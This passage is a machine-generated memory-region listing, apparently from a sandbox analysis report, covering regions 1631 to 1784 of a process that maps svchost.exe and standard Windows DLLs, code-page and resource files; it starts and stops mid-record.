end_va = 0xdc8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1631 start_va = 0xdd0000 end_va = 0xdd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1632 start_va = 0xde0000 end_va = 0xde1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1633 start_va = 0xdf0000 end_va = 0xdf9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1634 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1635 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 1636 start_va = 0x1000000 end_va = 0x1336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1637 start_va = 0x1340000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1638 start_va = 0x1440000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1639 start_va = 0x1540000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 1640 start_va = 0x15c0000 end_va = 0x15c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 1641 start_va = 0x15d0000 end_va = 0x15e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 1642 start_va = 0x15f0000 end_va = 0x15f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015f0000" filename = "" Region: id = 1643 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1644 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 1645 start_va = 0x1800000 end_va = 0x18dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1646 start_va = 0x18e0000 end_va = 0x18f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1647 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1648 start_va = 0x1a00000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1649 start_va = 0x1a80000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 1650 start_va = 0x1b80000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 1651 start_va = 0x1c80000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 1652 start_va = 0x1d00000 end_va = 0x1d10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 1653 start_va = 0x1d20000 end_va = 0x1d30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 1654 start_va = 0x1d40000 end_va = 0x1d50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 1655 start_va = 0x1d60000 end_va = 0x1d70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 1656 start_va = 0x1d80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1657 start_va = 0x1e80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1658 start_va = 0x1f80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1659 start_va = 0x2080000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1660 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1661 start_va = 0x2280000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1662 start_va = 0x2380000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1663 start_va = 0x2480000 end_va = 0x2490fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 1664 start_va = 0x24a0000 end_va = 0x24c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 1665 start_va = 0x24d0000 end_va = 0x24e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 1666 start_va = 0x24f0000 end_va = 0x24f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1667 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1668 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1669 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1670 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1671 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1672 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1673 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1674 start_va = 0x2c00000 end_va = 0x2c8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1675 start_va = 0x2c90000 end_va = 0x2cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 1676 start_va = 0x2cd0000 end_va = 0x2ce0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 1677 start_va = 0x2d10000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 1678 start_va = 0x2e10000 end_va = 0x2f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 1679 start_va = 0x2f10000 end_va = 0x300ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f10000" filename = "" Region: id = 1680 start_va = 0x3010000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 1681 start_va = 0x3110000 end_va = 0x3116fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1682 start_va = 0x3120000 end_va = 0x3150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 1683 start_va = 0x3170000 end_va = 0x3171fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003170000" filename = "" Region: id = 1684 start_va = 0x3190000 end_va = 0x328ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1685 start_va = 0x3290000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 1686 start_va = 0x3310000 end_va = 0x3340fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 1687 start_va = 0x3390000 end_va = 0x3396fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 1688 start_va = 0x33a0000 end_va = 0x341ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 1689 start_va = 0x3420000 end_va = 0x349ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 1690 start_va = 0x34e0000 end_va = 0x34e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 1691 start_va = 0x34f0000 end_va = 0x356ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 1692 start_va = 0x3570000 end_va = 0x35effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 1693 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 1694 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 1695 start_va = 0x3870000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1696 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1697 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1698 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 1699 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 1700 start_va = 0x3d80000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 1701 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1702 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1703 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1704 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1705 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1706 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1707 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1708 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1709 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1710 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1711 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1712 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1713 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1714 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1715 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 1716 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1717 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1718 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 1719 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 1720 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1721 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 1722 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1723 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 1724 start_va = 0x5a00000 end_va = 0x5afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1725 start_va = 0x5b00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 1726 start_va = 0x5c00000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1727 start_va = 0x5d00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 1728 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 1729 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1730 start_va = 0x6000000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 1731 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 1732 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1733 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 1734 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1735 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1736 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 1737 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 1738 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1739 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1740 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 1741 start_va = 0x6e00000 end_va = 0x6e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1742 start_va = 0x6e80000 end_va = 0x6f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e80000" filename = "" Region: id = 1743 start_va = 0x7980000 end_va = 0x7a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007980000" filename = "" Region: id = 1744 start_va = 0x7a80000 end_va = 0x7b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a80000" filename = "" Region: id = 1745 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1746 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1747 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1748 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1749 start_va = 0x7ff681250000 end_va = 0x7ff68125cfff monitored = 0 entry_point = 0x7ff681253980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1750 start_va = 0x7ff9fbed0000 end_va = 0x7ff9fbfa4fff monitored = 0 entry_point = 0x7ff9fbeecf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1751 start_va = 0x7ff9fbfb0000 end_va = 0x7ff9fbff3fff monitored = 0 entry_point = 0x7ff9fbfd83e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1752 start_va = 0x7ff9fc000000 end_va = 0x7ff9fc021fff monitored = 0 entry_point = 0x7ff9fc012540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1753 start_va = 0x7ff9fc350000 end_va = 0x7ff9fc5fffff monitored = 0 entry_point = 0x7ff9fc351cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1754 start_va = 0x7ff9fc640000 end_va = 0x7ff9fc657fff monitored = 0 entry_point = 0x7ff9fc64b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1755 start_va = 0x7ff9fc660000 end_va = 0x7ff9fc6bcfff monitored = 0 entry_point = 0x7ff9fc68e510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1756 start_va = 0x7ff9fc6c0000 end_va = 0x7ff9fc6f1fff monitored = 0 entry_point = 0x7ff9fc6cb0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1757 start_va = 0x7ff9fc740000 end_va = 0x7ff9fc77efff monitored = 0 entry_point = 0x7ff9fc7682d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1758 start_va = 0x7ff9fe1c0000 end_va = 0x7ff9fe23ffff monitored = 0 entry_point = 0x7ff9fe1ed280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1759 start_va = 0x7ff9fe400000 end_va = 0x7ff9fe435fff monitored = 0 entry_point = 0x7ff9fe4027f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1760 start_va = 0x7ff9fe4f0000 end_va = 0x7ff9fe500fff monitored = 0 entry_point = 0x7ff9fe4f28d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 1761 start_va = 0x7ff9fe510000 end_va = 0x7ff9fe526fff monitored = 0 entry_point = 0x7ff9fe517520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1762 start_va = 0x7ff9ffbf0000 end_va = 0x7ff9ffc56fff monitored = 0 entry_point = 0x7ff9ffbfb160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1763 start_va = 0x7ff9ffc60000 end_va = 0x7ff9ffd6efff monitored = 0 entry_point = 0x7ff9ffc9c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1764 start_va = 0x7ffa00360000 end_va = 0x7ffa0047cfff monitored = 0 entry_point = 0x7ffa0038fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1765 start_va = 0x7ffa01690000 end_va = 0x7ffa016a3fff monitored = 0 entry_point = 0x7ffa01693710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1766 start_va = 0x7ffa01740000 end_va = 0x7ffa0175dfff monitored = 0 entry_point = 0x7ffa0174ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1767 start_va = 0x7ffa069a0000 end_va = 0x7ffa069b5fff monitored = 0 entry_point = 0x7ffa069a1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1768 start_va = 0x7ffa07a20000 end_va = 0x7ffa07a30fff monitored = 0 entry_point = 0x7ffa07a27480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1769 start_va = 0x7ffa07a40000 end_va = 0x7ffa07ac3fff monitored = 0 entry_point = 0x7ffa07a58d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1770 start_va = 0x7ffa07ad0000 end_va = 0x7ffa07ae5fff monitored = 0 entry_point = 0x7ffa07ad55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1771 start_va = 0x7ffa07af0000 end_va = 0x7ffa07bc5fff monitored = 0 entry_point = 0x7ffa07b1a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1772 start_va = 0x7ffa07c20000 end_va = 0x7ffa07c83fff monitored = 0 entry_point = 0x7ffa07c3bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1773 start_va = 0x7ffa07c90000 end_va = 0x7ffa07cb4fff monitored = 0 entry_point = 0x7ffa07c99900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1774 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1775 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1776 start_va = 0x7ffa07de0000 end_va = 0x7ffa07e53fff monitored = 0 entry_point = 0x7ffa07df5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1777 start_va = 0x7ffa07e60000 end_va = 0x7ffa07f96fff monitored = 0 entry_point = 0x7ffa07ea0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1778 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1779 start_va = 0x7ffa083b0000 end_va = 0x7ffa083cdfff monitored = 0 entry_point = 0x7ffa083b3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1780 start_va = 0x7ffa083d0000 end_va = 0x7ffa08451fff monitored = 0 entry_point = 0x7ffa083d2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1781 start_va = 0x7ffa08460000 end_va = 0x7ffa08475fff monitored = 0 entry_point = 0x7ffa08461af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1782 start_va = 0x7ffa08480000 end_va = 0x7ffa08499fff monitored = 0 entry_point = 0x7ffa08482330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1783 start_va = 0x7ffa088d0000 end_va = 0x7ffa08915fff monitored = 0 entry_point = 0x7ffa088d79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1784 start_va = 0x7ffa08940000 end_va = 0x7ffa0894efff monitored = 0 entry_point = 0x7ffa08944960 region_type = mapped_file name = "nci.dll" filename = 